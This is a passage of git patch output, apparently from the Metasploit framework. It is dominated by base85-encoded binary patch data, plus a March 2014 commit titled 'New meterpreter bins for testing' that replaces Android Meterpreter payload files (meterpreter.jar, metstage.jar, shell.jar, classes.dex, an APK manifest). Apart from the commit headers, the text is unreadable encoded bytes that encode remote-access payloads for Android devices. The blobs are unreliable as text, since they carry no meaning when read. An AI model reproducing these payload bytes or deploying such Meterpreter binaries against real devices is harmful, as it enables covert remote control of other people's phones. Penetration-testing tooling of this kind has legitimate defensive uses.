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 diff --git a/data/android/metstage.jar b/data/android/metstage.jar index 095c7b9a64a328b35850cdffccaaae6fcd8dca33..1271994fbab34694c10605904afaff08038b88f0 100644 GIT binary patch delta 45 ucmdnZx0{bQz?+#xgn@&DgF$0j) From 60b5191873f43c0d1042d0f3d8da1b075afb96c8 Mon Sep 17 00:00:00 2001 From: joe Date: Fri, 7 Mar 2014 13:21:30 -0800 Subject: [PATCH 048/853] New meterpreter bins for testing. --- data/android/apk/AndroidManifest.xml | Bin 3588 -> 3536 bytes data/android/apk/classes.dex | Bin 6844 -> 10700 bytes data/android/apk/resources.arsc | Bin 1104 -> 1088 bytes data/android/meterpreter.jar | Bin 37661 -> 37700 bytes data/android/metstage.jar | Bin 1993 -> 1851 bytes data/android/shell.jar | Bin 1853 -> 1853 bytes 6 files changed, 0 insertions(+), 0 deletions(-) diff --git a/data/android/apk/AndroidManifest.xml b/data/android/apk/AndroidManifest.xml index 39fa1cea0e34dfb14a1666dbe18fab55ba0fbcbb..6ee7f3e36fed7e9e467fff4db6fd95f5a44848f9 100644 GIT binary patch literal 3536 zcmb`JO>oYOe0h1b$nZR z-qnpA@npwHc#h+@mblUZZD9Wv?+xg$(BC4y!{|C%`b2ls<7(@3eah7(@($jccy?9K z{OgIkiQg&_chMbuyXk%>7c{fA@ms@hRX^Y-PRiUZ=Kem#^{~y9%z9d9kMS;X8!5vc z8Fa}m;%oX0%eh4Qi4o6z7V(Zqhc&RZ8SA7S>oVToW$9>|eX#yIGwt@PYhFz)>kFQh zCcn$DKN>Nz!CB4`)8bkwqi^auq-)%_U^Nn1`gmW&IapsoYca=)7Py;B#Cdwnedl>O zt$1(Z=@Ii>BBO>bk=2*FnzAu(c*UdczSq`Fq?Q&TNXK6y2k-to??-?3e*B4-iuY-G z9SwH+60GZFaBM_^Ph){=co(FTBSsJQ(C6%D(9hFy+JjRgGH#One0s)Ki2Xk(K96NC zzZF+fE=NYp#k;Xc^b*>&%~iwiw(HX>?{&PF6Wpz(`}^2>`Wf#j-todE{Ez4ADr*1Ex>rxsh<26h&u(we+DL14z3S(AoBDMRvh&(~mcyC2 zLV9I`h&oS$pQI+IaW(CQ^lLEzhk7(t6tl=AQd3ckAqAphTJJH=XGTwHeAcL@++)9G zjo9w?8vPkAK0&G3&&^{Ke1;18wpmXi*lN}ue-(YGv{{>f0d0SeyYXpFe8;<`JkTC9 z-}BbWeDk>Ac^><_y-wfx4)e@7j5s&z;N@|_^P2m#=kumZo^|l@xZrv1RlGM!o^|l@ zxZuV9zG%H~mOSg=<#ECD8C2!>R>`vtULF@bpFtIGrsP=%FOLhJ&#a2~cFD62ULF@b zpIH^}oswrAygV*=KC>#`yCu&$czIm#d}dWVzrTK-t%H}x1=w1^JM}B!+@H}@F?`X-h4qhH--U8#^?VYz-CN4$P(v(A*ZV4dLJtZ15^w1ygV-KW(3c3hTXAY_dbQ)>khlmBJ3Xy*}l_wPQ-baoO>L%C0_Ui+-Q*0c5`2JM{fcitFJu zT{0VK{5^cT#BHSvdt}fhyNIvpeJt-0RcCD7#JGs|Oi7aiwtKX7(oA+~@6Wz818FeN z20iWfYiLm|t?Co@QH$SI*l!LQ*<_99iD~n!mC;vq8Peyxw_!CCS$g}Ki1V<%fYzpu zH7)TrpNNapTF;#4r)k6o6VDHs=L#7$b&0I5Xdz`|-r$Iboqdn3l}K$ZLy*oqMGl_* zMb1sX_kR4@r;7J#c^pk<`Vy?mWN>;&f>&dSXK)szxgn!>=g{lyJ?Q(Pv7G` z&PiX!?z^ygK&$ONPOpD2a-VF#^?QfdqyO=I>x%C}e(ndOearQGx3_z3rm^~#>F0Ti z`|B=b=e2(=_p+ycQX6^Q4=o6*Q+WZgE?$7Nme0me# z@h&M3wA;*gzqK;oJT7?8mHv*Ir0#qNd1g!@@M_k<%j1IQyv=esjQ4!WvkqP!7d+2l zpLRI!WXZD*ULF@b&t()_>a!Sfna z@m?x<*1^l;g6BO@#e2ErSqCqV3!e8t70>6*`_DRfd0gB7ywlY4 z`;b4!Q#qeh~W(Ad5nwA+XlLq_aG9CV+PXfNAcL|&F2B7YUp6G(hCm*``l zlo54-bzm#l0d|8uU;-Fm3S0@U1z!e-!4Ys2+zh@2ZU^^(`@!FUN5J>NE8s)mEGMb~ zOTfiI2VVt`fwzFYf@nV222$W_;6d^J|DUgDqeH>;Qibt^zlJ zd%+LDOW+S+Zir|pSOM08esC!m1xb(ve+I4rH-KBf9pD&v9{e2q8hijg0%|Q$Ggt;z zgLPmFxD;qW2UmbEf+OJT;5KkKcmNy&KLRg+m%wY_1fV+1K~M#n!9`#l7y@G;4W_|o z!ByZ8_!9UExB+|Deyl)tw)`p0@Q&EKs)FJePBD- z12m8ZSAxUf2Jmh00C*HU16~BLfaBl<_z;`|Y6Ipds059m18f7AffTp~TnD}ez5(t8 z$G|h-dGIRu7w|TC51a!34gMFX^HDY^1=XMyG=f&J92B5ieV`cNRw3LDgsDrIo`k7H zm>v`YR`(N{ODL9*mCgeT0G1NM5y60j631Ixh*uoAR^ zcF+M|KE0Iyjaz(&vmHi6Bc7xaNGU@Pbc+rR)A1ebw07za8?0$u|r zKpJF#0o;I(a;$UQKSHL6iY%S&eoGHQ$3NLYBa}IiST*ev{gJXD%IG*i1PJD1b@>ub)2e8id?zQxt(4&^VH&1uv>0^0%3c6;+ zPvzOK&eN~U(~soo+_qsW?=8@C<=l}M^I)ESEKh$D`aUb~vw8Lx^Yr7;V^+*t&_^u& zUFbZQc)s#+IbfaJv)|HBLFazsxywfZBCwTWetGF_NRK7G7_CyISz=40LP)12+0N;l z{bHFGbctoZR7x9tQOYIskC1*6bPr@P()0NRO5Fpk>#~bcrQxbOdRymCuW~Ntv#u15(=QsFV)6RZ6p7 zj(E9ey|%jr$XLfCDV#e0g1kxHF%#;-0r8msf~Y=q*T})gB*a z{8ci20ew!&Mf6Q6&!ZDkw$g`?MOM7ulEsz`ShB>DrIwtB6_MLF4?Xq}WF_uyPFG@8 z{E3u;{sFQIcRJgvahIF2g}yA)E%cX`yg^DI-2z#I6@%kyP|qPt-X!Hh`W<8)>bqG= zH+@UWQo3DA4}A}^0r`FmIUoJ@G~@!Sy^UxWm&8cCd{xaqzqWnj9-Wu_zT$2$ByzkWHV;O{g5rl{{>4PmeNVLN!dg{m$IJz z88VEPbNON11-D7*qHjaCTK(3F)$RvKFSgpVWJW6V1nkRjrLRiaNUuRIr@8c3QkKyj zQa00lkOiO^EC77COhI<;7#z8Mfc?C7MIigJ&=y;MzL)vnw(`OLz3|srelOAjsDKal z^RW{C*HCC7boS@!-wr*6{FlQ27L2*Qhy8xkKLmLg{+q1wc|Xc;{|=<@hW}B^&wJEt z|1tQVg8#QDlzp@P&%*x#{3qe(wQIKjIQ+kW{}1r<-ZI<&F8pu9|1tcfXYv0Y{@=mR zhXO7`oCdg$bW6`da=%;)$uZYM9?jEl&(rVA(;vyxpM=h3{6tD2^|tvW*OQcg6+Awa ztw{SC*d4I!7J_m<)$*;kd=bB(2|thM>3mye@+rv2E%o6#xKxZad``$3rHk}X0agUB z?5kY4dn|th`6m2469UrDE#-EP!q018iU$$p=In_XJNN!+duGPYBjQ6|A+O*H*ehTO zirx5L+X`!C;;CavP0uO^irL0qYOLR zpodiCPWek<=W8;@?i(n>CF@!O-^I}4$aVUfZ-w9NBXc~>YsTjj*tvHCB7m#u#5KE> zrD&fXS|jxbYq7hD#*;t8##n^GDnTiB#D5R@p5ppE)fB` z=z6FJ>#old$r?*goVby%fS zq1EW;v-s@QvW*&ii*W^R&q|LSdMorgXAOKyXa~w!jul4tFT;G){Y!DK6Z5Fj!y~9d(yN2RY*YI^HMbj<7ZaIQ7T)mOwh`usRI_Z8#Z5%AT&pNs9IzxMLF zXP5I$P!&FC;GcrZE(&z(p>E73p26#Q1}PK%4oEjm$j>cqWu+3JIaVO4232vptxsxtT|L4bbPIKNlDd-Y%#+bR*ay>4d zi)MNgmqK;+R*Zcv2YWYg9gy%kgRbmM2_-H+RvuaB>{6Vm&=6%Q=)4orUHDAocCK)) z!S(OJxOg2kj%Dy&i`*-$QcqC*bE~P+y@>kU1s)#pLj_)E{j+PR&*4J4k6uL`+vrEg zhj|woz;mJQ--1=QPOXI256z2O&&Ox5VW)@ck9E?-nlgI%knZ0KpD(ZO7HY(%&g%l- z@Aso`S3?gvMk%m?`*ad5wm1qyv%8Pg}JxO(ZDL#cjhbAh>N9 zImk{(w^%8hn7{K77bq?g6LQsT{9_?juf{*Xh@-+RH;B^lNAzDPH-Fu8!piB7V7~w| z6kA3s)FyK7t--TUo$z7ZszOXq-HGeI6xZ!l0&1YNe(gF6*!zUdUT0s7n4K71ea#+P z9MS!k@%@DvehHqs^w4g(wyVg=M~$_&^8C)(7UbE?T@}x7uyMNrcy8;)?q;*{FM%Dm z2L-Sn<*up2ip}l6IeXVR>>JKu?>&co+d1q*v+VqiGyiyYRyyb7_VZB&jw6QmI+nSE z$BBdjtr2gIL<@;9t!iDg_`)Simn~nhva_pu?Yi|F zHuh}V+}pQhYyY-^!N~TZ9Xl`H6&;R^X!}OT;+OAFjO)qNL^@++Cl5?bUqPasT}WmOv~on7Sb%El8T-AR34e6;2A=wy^cH!0mcWM8|kYx@RruFobC+Xs3` z-LNh~qKA|ork4b^fnHL2yUE_WaqD0NDjdDNr1s)u@9p0@5TUufQGFzxjE{t)sZ_W# zX2d7s#&jE1%-CZ|-OzL+j20N$l+i|WW?ackxHB`Y$0E_p{=Aa%&23bYAKsPKM-o~a z)z26w5m7S8LW zHkyC-n7(LS&s|}|qW@pmVs7hMYs@dLjjGQc)E}KrB%>p3wD1%Ck#sg=^hI@C39h^9 z?6Ct4QNw_{_FV3fbo4-Un7eo0xkBP-O3k^PiRg4Pivd1oK*mVN_0cveKSv2XIwR4< zWPE=(s_RK3YQ&Rzc%2?gBs0j^orq>K+@GHi)2A6@Ni?$hEI~awriE2V?OFVN+W4>) zprM|svxE%BNA;+YO{0&3XK_cy(#ZqJI#YXQ8k2E6yjGi%_4Z;cd4wu@`9=)Kli{^d zBif^3Oaz8P;!OB>;xOIufVLy7N;$D#(NgmuwbBc2H7a+1Xi`YMG4elG(K*pV>9*qcJ0y#$I7w z_vw<)T+L?Z=Sw~_qBwskHMcmgwQ!oLax0ae&Ga}1OsS$(;% zX9jTE)4g$B_vXRveS3Pg^h7qX1Dod%DMQ#Uhc*FhnM2q+aq1--PS`#9jLmgu7d7m} zv1sw~mR9^NI!CS4a50W0IL;9u%_Me_vJ18CLfH+waC}lU`$*Z{MSx{k# zy2rGyPeeyEm&T+)ivESLiT-$Y-WtqeaRF#_a)O?xX+75HKTJllT4r-nJ2&o3>&ZZ zJ()}veN8^tTi>$0pVe@7!fd}pjP&wm3S3l=ukHk-}p%IpX?caz8HKe5fHcfxdO%G>Sg7C%7moNMJjc zEjQIcev*VUl}uw;64`WuY~y%lB{=TRsmUx}ZKR@U^tQpB>5w|+J!D4XQfw(6c2CNDl5D{| zIGwmWnx>)@c2YckU>ZcyQS_>sGBAD9a@#R)aw_1Rl0PR*lap00*JIr(8zYf^a$AW= zcR#6VOeK+_KqfkgQMLvP6<{tYnPCv4!i>fZ#rofk8;qP8bGIO026Msuz`!$$+(@s* zB*jAzl|Y}pb)gc?nDyXK9@zTR=&7_ZO@1T>w27>S2W0tdD9f3>36VXM(6khUIff7z zL$?(2BMQo4(}1}=@CaDm%#Jv^*O8IWBUF&d4qK|t7>i>(_}tJ+sxh7-myxtO)Q0eJ zQZWBio+eJ5WSNd^Mq8i6!UUOa8Nm%8Cdob-O=K|@vChQzO_Tiqo(|BJQz(_3KD?XZ zbCvi&IDNZlzD&&*Cy^40U7<$tv~>75$|vnP(F)T`&0B)iDjgB?@$%5=dz{L|PZ8g~ z`<-@tYlkeQeCiZ0!dR_}cZ4E@O7{pQzO#eIZTE?%#Fxb1!}+jU@I%ogDvDIcQI^H3 z?XYOttg2rYO0%k5Cswy#qS9Z$)ZDR4wSQgI#37wGi%@&}s_&}ekf_{jb3G>N+cvB2 zH$-FmA+flW>cwZAz7JJ;9QC^FqzWi4({|yYN;^43GiySyTEi+`Bp&3eRmDqUq1Di4 zF{iKtzqD{}s#TS%g>si_dxRS%E@|4lMU?qfDr^$x`BnRG#G*rS)p0_EMMY`*uJ*61 z>V2YWs$DryWmoME;cz(UM(*B+RplYk^suUaS2W$I+K!3V8&!eO8&&&LqV77oK)B6r zudw>H1zALK(dru6%@ua)t42$gaKCO9?{RaRRk~X&N2{L`MR8SmS*-ZoREM2VkV31J zgW|IY?Y1OdSo&y#a;JC&Iq^Chr$RpY`BcKExqNctq^~4mn{s6?8olIy_HYEgqbwpo7$)2zrp~#d+e|(7Sv(SZPy^Rw~N7m40!! z%7w2;?d76E{;@0&uF`7{+J06gkn2>Ha9vj|+|N{tg5$Nq^(4N}xussXe?MQikKnbM zVyi;bi3PTTs~fAuiAEs~HVJX0NfGxo@e7`Mc%N+Iwii}3KtC>ZU&VarA4y&dn^84lYirg zB<%(KJ4b%U#qYKFw~i{lbK~!Z`CXt0neXr#@V?Cfoxc<2?|=nj_}wmlFRZ}M_402c kRp_du&_hb->TPm!u?;qA1CF(XvhJ6~8IJYNt}{_?f7ZW7k%l)Xt+6c`ehTE?M&G zl@_&{Ic=I`d9-QLHU-ud*pfdotVL5aa9afEg1rX>U5B_`mb4v;CBudVP1XenHtcsU zFJ)ShhJDiSp7WjayJa**z@?FZ^4V$g^l_-wm&uA{&v zcR(4w4Bv;J!n?4BHtm4ZFbB`TRroplC$!PyK^TL(VICfb=in;53U7n7k`^|@EpQiH zf-k_=;ZNYl@G4w`e}p&TpW!X|4`^E>G6VhQEPp@N4*2cn73S z#DXxiK@V((U9cYx!N=h|+zXR11NXxt@GLwJFTtO|&)_xqC-@co2L2s>2mb@Xc7_)^ zU>yuV3iiTb7=>}T7aS8z8Xc2r`lo8rd<$LswF5NNGut6#SfcV3 zWW<+IdK)FKlH)^SV#pM-3Hb?R9O)vPk*AS5Cl7-uYd~eYdFQX)j}ou<;|)tPCReaGu&N(JhFRfSZkW}6KQiLSBh1XbUcAMZmZXVC{c@tDJL$!{ zk7gII_{tAM<6CFXO&!_GODNyVz~ozAjo^LMGUW8c(ni zAM_+=C~_?$rS@({G>cqE{&Sw(AYVr&Ie;&EG9vTH9{dj=d&#wk?DOmEr(7+kpBZ`5 zlSz5XlQDT3IpC)oV5ZJ^@n&Df&a=GF3j&Ax9uZpf$Ox*D(N>srcZl21oE#!PCd+)wf8 zJ$Qq;i{3MkMPfI@`BoN2#$NShDL=PKA$gHlL_#i!wnu*Zy4_mFCz-HRCm9~aM#leqAU#Q1OFvt77 zHCIe-jCW$czE{7nG*&n6;YU`nKe3AatEN_iidR`J;N1sR^CS;(g2F+8*5xDy#JS`XEy0tKXlu zKAv`~?N_;L$)EDq&s&@?YFiH~^%+!s{odb3&$e9xJ1(V5Vhl@Y zIOpWt17aQ+lKA17Tt0iG;9ST};-5{6aYTYgj~)KRZDNdwIiie-F(&31jsC&5x-adzbavxv?rbSNm!8l;Tf174Ty{t{tme$87YZ{>+o}o5 zZYk$X4oT-KCFq!E)A`xlR4VN_1vl;H3Qp>nlgSs#WIU2jm&-Z^|3{h=wtKNaBiFBx zXvAT%{X#ab;6GtcPxuLJ>RGo!k~6tUC+*IZ7^B1r?(vJI!W>zbYA-La#HLe6?Rl?W zT^G9Ey2f-nrE-PT(X^W$af&nU8MkDor?uEx*U1^T#ur=i9na}BT~Dj=8`HKerM;o} 